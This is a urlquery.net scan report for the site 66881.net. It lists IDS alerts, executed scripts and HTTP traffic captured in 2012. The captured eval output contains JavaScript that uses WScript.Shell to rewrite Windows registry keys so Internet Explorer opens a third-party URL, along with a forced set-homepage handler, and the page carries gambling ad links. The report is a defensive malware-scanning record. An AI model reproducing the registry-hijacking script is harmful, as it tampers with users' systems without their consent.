urlquery.net - Free url scanner

Overview

URL	http://66881.net/
IP	58.49.58.242
ASN	AS4134 Chinanet
Location	China
Report completed	2012-11-06 05:10:14 CET
Status	Loading report..
urlQuery Alerts	No alerts detected

Settings

UserAgent	Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader	8.0
Java	1.6.0_26

Intrusion Detection Systems

Suricata /w Emerging Threats Pro

Timestamp	Source IP	Destination IP	Severity	Alert
2012-11-06 05:09:51	123.125.115.75	urlQuery Client	3	FILEMAGIC Macromedia Flash data (compressed),

Snort /w Sourcefire VRT

Timestamp	Source IP	Destination IP	Severity	Alert
2012-11-06 05:09:40	58.49.58.242	urlQuery Client	1	BROWSER-IE Microsoft Internet Explorer userdata behavior memory corruption attempt

Recent reports on same IP/ASN/Domain

Last 1 reports on IP: 58.49.58.242

Date	Alerts / IDS	URL	IP
2012-11-07 13:10:14	0 / 4	http://www.66881.net/	58.49.58.242

Last 6 reports on ASN: AS4134 Chinanet

Date	Alerts / IDS	URL	IP
2013-03-01 08:21:47	0 / 1	http://seo.seowhy.com/	60.169.74.135
2013-03-01 08:06:43	0 / 1	http://www.xcoodir.com	122.226.213.48
2013-03-01 07:56:57	0 / 4	http://www.kuocha.com/	60.191.137.122
2013-03-01 07:49:16	0 / 1	http://jrsx.jre.net.cn/logos.gif?256c0=1379520	222.186.222.250
2013-03-01 07:35:01	0 / 1	http://www.58888.net/soft/index.asp?ruanjianmingcheng=xc8xcbxccxe5xd2xd5xcaxf5	60.169.79.8
2013-03-01 07:22:12	0 / 1	http://jrsx.jre.net.cn/logos.gif?20955=400383	222.186.222.250

JavaScript

Executed Scripts (27)

Executed Evals (1)

#1 JavaScript::Eval (size: 972, repeated: 1)

document.writeln("<script language=\"JavaScript\"> ");
document.writeln("var WshShell = new ActiveXObject(\"WScript.Shell\");");
document.writeln("var url=\"C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe http:\/\/www.75ke.com\/?1103\";");
document.writeln("WshShell.RegWrite(\"HKEY_CLASSES_ROOT\\\\CLSID\\\\{86AEFBE8-763F-0647-899C-A93278894D8E}\\\\Shell\\\\Open\\\\Command\\\\\", url,\"REG_SZ\");");
document.writeln("WshShell.RegWrite(\"HKEY_CLASSES_ROOT\\\\CLSID\\\\{871C5380-42A0-1069-A2EA-08002B30309D}\\\\shell\\\\OpenHomePage\\\\Command\\\\\",url);");
document.writeln("WshShell.RegWrite(\"HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Classes\\\\CLSID\\\\{86AEFBE8-763F-0647-899C-A93278894D8E}\\\\Shell\\\\Open\\\\Command\\\\\", url);");
document.writeln("WshShell.RegWrite(\"HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Classes\\\\CLSID\\\\{871C5380-42A0-1069-A2EA-08002B30309D}\\\\shell\\\\OpenHomePage\\\\Command\\\\\", url);");
document.writeln("<\/script>");
document.writeln("");

Executed Writes (27)

#1 JavaScript::Write (size: 0, repeated: 1)

#2 JavaScript::Write (size: 11, repeated: 5)

</div></td>

#3 JavaScript::Write (size: 9, repeated: 1)

</script>

#4 JavaScript::Write (size: 5, repeated: 1)

</tr>

#5 JavaScript::Write (size: 238, repeated: 1)

<a href="http://www.51.la/?3285797" target="_blank" title="&#x35;&#x31;&#x2E;&#x6C;&#x61;&#x20;&#x4E13;&#x4E1A;&#x3001;&#x514D;&#x8D39;&#x3001;&#x5F3A;&#x5065;&#x7684;&#x8BBF;&#x95EE;&#x7EDF;&#x8BA1;">&#x7F51;&#x7AD9;&#x7EDF;&#x8BA1;</a>

#6 JavaScript::Write (size: 732, repeated: 1)

<a href=http://www.wz123.net/c/CF.asp?Action=countgo&UserName=wz123net target=_blank title=&#x7EDF;&#x8BA1;&#x670D;&#x52A1;&#x7531;&#x5B;&#x7F51;&#x7AD9;&#x5BB6;&#x56ED;&#x8BA1;&#x6570;&#x7CFB;&#x7EDF;&#x5D;&#x63D0;&#x4F9B;><img src=http://www.wz123.net/c/CounterPic/16/1.gif border='0'><img src=http://www.wz123.net/c/CounterPic/16/2.gif border='0'><img src=http://www.wz123.net/c/CounterPic/16/3.gif border='0'><img src=http://www.wz123.net/c/CounterPic/16/6.gif border='0'><img src=http://www.wz123.net/c/CounterPic/16/9.gif border='0'><img src=http://www.wz123.net/c/CounterPic/16/1.gif border='0'><img src=http://www.wz123.net/c/CounterPic/16/9.gif border='0'><img src=http://www.wz123.net/c/CounterPic/16/3.gif border='0'></a>

#7 JavaScript::Write (size: 20, repeated: 1)

<a title="*3Q,Ã¡(,

#8 JavaScript::Write (size: 19, repeated: 1)

<a title="2012Â°2

#9 JavaScript::Write (size: 431, repeated: 1)

<a title="ttQ@1P,2012c0ttQ@sÃ°" href="http://www.sogou.com/bill_cpc?p=qozyJtYiGuHyuwLnllllLkl1o1YbtuDOj0G8A7nK021yUptKwy3kV0UT2F9inFwZlJLXDrxEWyVyuwLnlllxayl7K1DB2ycNj7x$RlllFoyj9GlY5lLm6loA0FkllllAlllxx4S18K0QHZRcCrt=&q=cj0zMyZoPTE2ODU2MTcxNCZ2PTUmYz1PJnB2aWQ9ZTU2ZDM1ODRiMmY2MDFhOCZ0PTAmZ3Q9MCZ1cG9zPTAmZGlkPTE5NjEwOSZ1cGlkPTAmeD0xMTUxNjAwJnk9MTE1MTYwMCZidj0yAA==&url=http%3A%2F%2Fwww.playboybet88.com%2F" >ttQ@1P,2012c..</a>

#10 JavaScript::Write (size: 443, repeated: 1)

<a title="Â2Q
1Pl365Q@sÃ°,(Â¿8Â	QÃ" href="http://www.sogou.com/bill_cpc?p=U3Pkn0y01xVyuwLnllll7klpvBcgRd0qjAPldDnK021yUptKwy3kV0UT2F9inFwZlJLXDrxEWyVyuwLnlllxayl7K1DB2ycNj7x$RlllFoyj9GlYnED1RyoA5kYllllAllllHRGL2tTcCrtlM2zT&q=cj0zMyZoPTE2ODU2MTcxNCZ2PTUmYz1PJnB2aWQ9ZTU2ZDM1ODRiMmY2MDFhOCZ0PTAmZ3Q9MCZ1cG9zPTAmZGlkPTE5NjEwOSZ1cGlkPTAmeD0xMTUxNjAwJnk9MTE1MTYwMCZidj0yAA==&url=http%3A%2F%2Fwww.hlgbet.info%2F" >Â2Q
1Pl365Q@..</a>

#11 JavaScript::Write (size: 69, repeated: 1)

<a title="Â§3Â¯ÃqÂQ@ÂÂ¹ÂÂ¢,Ã¬Â«yÃ·,Ã´Â¥

#12 JavaScript::Write (size: 172, repeated: 1)

<body onclick="this.style.behavior='url(#default#homepage)';if(!(this.isHomePage('http://www.66881.net/'))&&setN!=1){this.sethomepage('http://www.66881.net/');exitSet();}">

#13 JavaScript::Write (size: 23, repeated: 5)

<div id="div_textlink">

#14 JavaScript::Write (size: 714, repeated: 1)

<div style="display:none">-</div> <iframe id="cproIframe1"src="http://cpro.baidu.com/cpro/ui/uijs.php?tu=u1103347&tn=text_default_234_60&n=31073069_cpr&rsi1=60&rsi0=234&rad=&rss0=%23FFFFFF&rss1=%23FFFFFF&rss2=%23f24d1b&rss3=%23444444&rss4=%23008000&rss5=&rss6=%23e10900&rsi5=4&ts=1&at=32&ch=0&cad=1&aurl=&rss7=&cpa=1&fv=10&cn=1&if=16&word=http%3A%2F%2F66881.net%2F&refer=&ready=1&jk=c890829b2798646d&jn=3&lmt=1351991994&csp=1176,885&csn=1176,855&ccd=24&chi=1&cja=true&cpl=8&cmi=54&cce=true&csl=en-US&did=1&rt=45&dt=1352174987&ev=16777216&c01=0&prt=1352174986556&i3=f" width="234" height="60" align="center,center" marginwidth="0"  marginheight="0" scrolling="no" frameborder="0" allowtransparency="true" ></iframe>

#15 JavaScript::Write (size: 822, repeated: 1)

<div style="display:none">-</div> <iframe id="starIframe1" onload="document.cc1=true;" src="http://inte.sogou.com/textlink?pid=57519920&ct=textlink&iw=720&ih=19&c_bg=fcfff7&c_te=083c80&c_ho=FF3300&rn=1&cn=5&fs=12&pr=0&cm=10&ul=1&al=3&ppc=0&charset=gb2312&ct_uniq=1&ilp=1&tmp_mif=0&tmp_cdif=0&tmp_cts=0&id=&h=19&w=720&fv=10&if=16&sohuurl=http%3A%2F%2F66881.net%2F&refer=&rnd=fff7104e96f666f7&z=e56d3584b2f601a8&lmt=1351991994&srp=1176,885&ccd=24&lhi=1&eja=true&npl=8&nmi=54&ece=true&lan=en-US&bi=1&t1=52&t2=1352174987&pvt=1352174986671&ti=66881%E7%BD%91%E5%9D%80%E5%AF%BC%E8%88%AA_%E4%B8%AD%E5%9B%BD%E6%9C%80%E5%A5%BD%E7%9A%84%E4%B8%8A%E7%BD%91%E4%B8%BB%E9%A1%B5!&bs=1159,778" width="720" height="19" align="center,center" marginwidth="0"  marginheight="0" scrolling="no" frameborder="0" allowtransparency="true" ></iframe>

#16 JavaScript::Write (size: 207, repeated: 1)

<img style="width:0px;height:0px" src="http://web1.51.la:82/go.asp?svid=5&id=3285797&checkcc=1&bookmark=1&checkget=1&tpages=1&ttimes=1&tzone=1&tcolor=24&sSize=1176,885&referrer=&vpage=http%3A//66881.net/" />

#17 JavaScript::Write (size: 31, repeated: 1)

<script language="JavaScript">

#18 JavaScript::Write (size: 235, repeated: 1)

<script src="http://www.wz123.net/c/CF.asp?Action=countget_2&UserName=wz123net&Assort=0&FirstShow=1&VisitTotal=1&Ly=&CurrWeb=http%3A//66881.net/&screenwidth=1176&screenheight=885&screencolordepth=24&ranstr=0.6318085323274704"></script>

#19 JavaScript::Write (size: 166, repeated: 1)

<script type="text/javascript" charset="utf-8" src="http://pos.baidu.com/ecom?di=u1103347&tm=BAIDU_CPRO_SETJSONADSLOT&fn=BAIDU_CPRO_SETJSONADSLOT&baidu_id="></script>

#20 JavaScript::Write (size: 54, repeated: 5)

<td class="ad_td" style="font-size:12px;width:144px;">

#21 JavaScript::Write (size: 4, repeated: 1)

<tr>

#22 JavaScript::Write (size: 124, repeated: 1)

WshShell.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\{86AEFBE8-763F-0647-899C-A93278894D8E}\\Shell\\Open\\Command\\", url,"REG_SZ");

#23 JavaScript::Write (size: 122, repeated: 1)

WshShell.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\shell\\OpenHomePage\\Command\\",url);

#24 JavaScript::Write (size: 135, repeated: 1)

WshShell.RegWrite("HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{86AEFBE8-763F-0647-899C-A93278894D8E}\\Shell\\Open\\Command\\", url);

#25 JavaScript::Write (size: 143, repeated: 1)

WshShell.RegWrite("HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\shell\\OpenHomePage\\Command\\", url);

#26 JavaScript::Write (size: 50, repeated: 1)

var WshShell = new ActiveXObject("WScript.Shell");

#27 JavaScript::Write (size: 87, repeated: 1)

var url="C:\\Program Files\\Internet Explorer\\iexplore.exe http://www.75ke.com/?1103";

HTTP Transactions (44)

Request	Response
GET /g/js/tj.js HTTP/1.1 Host: 66881.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://66881.net/	HTTP/1.1 200 OK Content-Type: application/x-javascript Date: Tue, 06 Nov 2012 04:09:30 GMT Content-Length: 634 Content-Location: http://66881.net/g/js/tj.js Last-Modified: Mon, 26 Dec 2011 05:34:32 GMT Accept-Ranges: bytes Etag: "5645dcb90c3cc1:4ad4a" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET
GET /g/indexFile/config.js HTTP/1.1 Host: 66881.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://66881.net/	HTTP/1.1 200 OK Content-Type: application/x-javascript Date: Tue, 06 Nov 2012 04:09:30 GMT Content-Length: 4344 Content-Location: http://66881.net/g/indexFile/config.js Last-Modified: Thu, 11 Oct 2012 13:25:27 GMT Accept-Ranges: bytes Etag: "42697be0b3a7cd1:4ad4a" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET
GET /g/indexFile/base.js HTTP/1.1 Host: 66881.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://66881.net/	HTTP/1.1 200 OK Content-Type: application/x-javascript Date: Tue, 06 Nov 2012 04:09:30 GMT Content-Length: 8620 Content-Location: http://66881.net/g/indexFile/base.js Last-Modified: Thu, 11 Oct 2012 13:25:00 GMT Accept-Ranges: bytes Etag: "09e57d0b3a7cd1:4ad4a" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET
GET /g/indexFile/home.gif HTTP/1.1 Host: 66881.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://66881.net/	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 04:09:32 GMT Content-Length: 1027 Content-Location: http://66881.net/g/indexFile/home.gif Last-Modified: Thu, 11 Oct 2012 13:25:50 GMT Accept-Ranges: bytes Etag: "e07397eeb3a7cd1:4ad4a" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET
GET /g/indexFile/hao222logo.gif HTTP/1.1 Host: 66881.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://66881.net/	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 04:09:32 GMT Content-Length: 4322 Content-Location: http://66881.net/g/indexFile/hao222logo.gif Last-Modified: Thu, 11 Oct 2012 13:25:25 GMT Accept-Ranges: bytes Etag: "f837a7dfb3a7cd1:4ad4a" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET
GET /g/js/external.js HTTP/1.1 Host: 66881.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://66881.net/	HTTP/1.1 200 OK Content-Type: application/x-javascript Date: Tue, 06 Nov 2012 04:09:30 GMT Content-Length: 14675 Content-Location: http://66881.net/g/js/external.js Last-Modified: Tue, 25 Sep 2012 17:24:43 GMT Accept-Ranges: bytes Etag: "e8c8b4a6429bcd1:4ad4a" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET
GET / HTTP/1.1 Host: 66881.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 200 OK Content-Type: text/html Date: Tue, 06 Nov 2012 04:09:28 GMT Content-Length: 56685 Content-Location: http://66881.net/index.html Last-Modified: Sun, 04 Nov 2012 01:19:54 GMT Accept-Ranges: bytes Etag: "56fa2b7f2abacd1:4ad4a" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET
GET /g/indexFile/logox3.gif HTTP/1.1 Host: 66881.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://66881.net/	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 04:09:33 GMT Content-Length: 2070 Content-Location: http://66881.net/g/indexFile/logox3.gif Last-Modified: Thu, 11 Oct 2012 13:25:29 GMT Accept-Ranges: bytes Etag: "3c1ed5e1b3a7cd1:4ad4a" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET
GET /favicon.ico HTTP/1.1 Host: 66881.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 200 OK Content-Type: image/x-icon Date: Tue, 06 Nov 2012 04:09:29 GMT Content-Length: 9662 Content-Location: http://66881.net/favicon.ico Last-Modified: Mon, 15 Oct 2012 01:27:43 GMT Accept-Ranges: bytes Etag: "b82de4674aacd1:4ad4a" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET
GET /cs/jsfile/js/ct.js HTTP/1.1 Host: images.sohu.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://66881.net/	HTTP/1.0 200 OK Content-Type: application/x-javascript Content-Length: 12139 Date: Fri, 02 Nov 2012 09:08:51 GMT Server: SWS Vary: Accept-Encoding Cache-Control: max-age=7776000 Expires: Thu, 31 Jan 2013 09:08:51 GMT Last-Modified: Thu, 25 Oct 2012 08:05:34 GMT Content-Encoding: gzip FSS-Cache: HIT from 8152011.14967765.8830259 Accept-Ranges: bytes Age: 327651 Powered-By-ChinaCache: HIT from 50000613T4 Connection: keep-alive
GET /g/indexFile/main_201012222400.js HTTP/1.1 Host: 66881.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://66881.net/	HTTP/1.1 200 OK Content-Type: application/x-javascript Date: Tue, 06 Nov 2012 04:09:32 GMT Content-Length: 27222 Content-Location: http://66881.net/g/indexFile/main_201012222400.js Last-Modified: Thu, 11 Oct 2012 13:25:30 GMT Accept-Ranges: bytes Etag: "a27c1e2b3a7cd1:4ad4a" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET
GET /indexFile/sug.js HTTP/1.1 Host: 66881.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://66881.net/	HTTP/1.1 404 Not Found Content-Type: text/html Date: Tue, 06 Nov 2012 04:09:35 GMT Content-Length: 1308 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET
GET /indexFile/monitor.js HTTP/1.1 Host: 66881.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://66881.net/	HTTP/1.1 404 Not Found Content-Type: text/html Date: Tue, 06 Nov 2012 04:09:35 GMT Content-Length: 1308 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET
GET /3285797.js HTTP/1.1 Host: js.users.51.la User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://66881.net/	HTTP/1.1 200 OK Content-Type: application/x-javascript Cache-Control: max-age=300 Content-Length: 1938 Last-Modified: Wed, 19 Sep 2012 15:34:29 GMT Accept-Ranges: bytes Etag: "14a667427c96cd1:9b1" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 06 Nov 2012 04:09:42 GMT Connection: close
GET /data/html/tianqi.htm HTTP/1.1 Host: www.6296.com.cn User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://66881.net/	HTTP/1.1 200 OK Content-Type: text/html Content-Length: 1673 Content-Encoding: gzip Content-Location: http://www.6296.com.cn/data/html/tianqi.htm Last-Modified: Sat, 17 Sep 2011 17:36:07 GMT Accept-Ranges: bytes Etag: "80ddde476075cc1:1900" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 06 Nov 2012 04:05:04 GMT
GET /cpro/ui/c.js HTTP/1.1 Host: cpro.baidustatic.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://66881.net/	HTTP/1.1 200 OK Content-Type: application/x-javascript Date: Tue, 06 Nov 2012 04:09:42 GMT Content-Length: 16189 Last-Modified: Fri, 26 Oct 2012 03:00:00 GMT Connection: keep-alive Content-Encoding: gzip Server: Apache Set-Cookie: BAIDUID=F3FB4D14EB4D0DE15E7671155DBDD517:FG=1; expires=Wed, 06-Nov-13 04:09:42 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1 P3P: CP=" OTI DSP COR IVA OUR IND COM " Expires: Tue, 06 Nov 2012 05:09:42 GMT Cache-Control: max-age=3600
GET /c/cf.asp?username=wz123net HTTP/1.1 Host: www.wz123.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://66881.net/	HTTP/1.1 200 OK Content-Type: text/html Date: Tue, 06 Nov 2012 04:11:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CookieZJWFANGDAOLIAN=195.159.140.221#2012-11-06-12#www.wz123.net; expires=06-11-2012 23:59:59; path=/; ASPSESSIONIDCSTQQRTS=EHNBKEMDNFJELHFFKLGKFOPL; path=/ Content-Length: 3363 Cache-Control: private
GET /ecom?di=u1103347&tm=BAIDU_CPRO_SETJSONADSLOT&fn=BAIDU_CPRO_SETJSONADSLOT&baidu_id= HTTP/1.1 Host: pos.baidu.com GET /ecom?di=u1103347&tm=BAIDU_CPRO_SETJSONADSLOT&fn=BAIDU_CPRO_SETJSONADSLOT&baidu_id= HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://66881.net/	HTTP/1.1 200 OK Content-Type: text/javascript;charset=UTF-8 Date: Tue, 06 Nov 2012 04:09:46 GMT Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Server: Apache
GET /g/images/ss.jpg HTTP/1.1 Host: www.66881.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://66881.net/	HTTP/1.1 200 OK Content-Type: image/jpeg Date: Tue, 06 Nov 2012 04:09:36 GMT Content-Length: 30568 Content-Location: http://www.66881.net/g/images/ss.jpg Last-Modified: Fri, 02 Nov 2012 04:05:59 GMT Accept-Ranges: bytes Etag: "52f7da5dafb8cd1:4ad4a" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET
GET /g/images/line.gif HTTP/1.1 Host: 66881.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://66881.net/	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 04:09:39 GMT Content-Length: 67 Content-Location: http://66881.net/g/images/line.gif Last-Modified: Thu, 11 Oct 2012 13:17:58 GMT Accept-Ranges: bytes Etag: "a2e34dd5b2a7cd1:4ad4a" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET
GET /images/dropdown.gif HTTP/1.1 Host: 66881.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://66881.net/	HTTP/1.1 404 Not Found Content-Type: text/html Date: Tue, 06 Nov 2012 04:09:39 GMT Content-Length: 1308 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET
GET /c/CF.asp?Action=countget_2&UserName=wz123net&Assort=0&FirstShow=1&VisitTotal=1&Ly=&CurrWeb=http%3A//66881.net/&screenwidth=1176&screenheight=885&screencolordepth=24&ranstr=0.6318085323274704 HTTP/1.1 Host: www.wz123.net GET /c/CF.asp?Action=countget_2&UserName=wz123net&Assort=0&FirstShow=1&VisitTotal=1&Ly=&CurrWeb=http%3A//66881.net/&screenwidth=1176&screenheight=885&screencolordepth=24&ranstr=0.6318085323274704 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://66881.net/ Cookie: ASPSESSIONIDCSTQQRTS=EHNBKEMDNFJELHFFKLGKFOPL	HTTP/1.1 200 OK Content-Type: text/html Date: Tue, 06 Nov 2012 04:11:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CookieZJWFANGDAOLIAN=195.159.140.221#2012-11-06-12#www.wz123.net; expires=06-11-2012 23:59:59; path=/; Content-Length: 751 Cache-Control: private
GET /c/CounterPic/16/1.gif HTTP/1.1 Host: www.wz123.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://66881.net/ Cookie: ASPSESSIONIDCSTQQRTS=EHNBKEMDNFJELHFFKLGKFOPL	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 04:11:52 GMT Content-Length: 850 Last-Modified: Sun, 01 Jul 2012 16:13:59 GMT Accept-Ranges: bytes Etag: "4ad8d485a457cd1:2f21c" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET
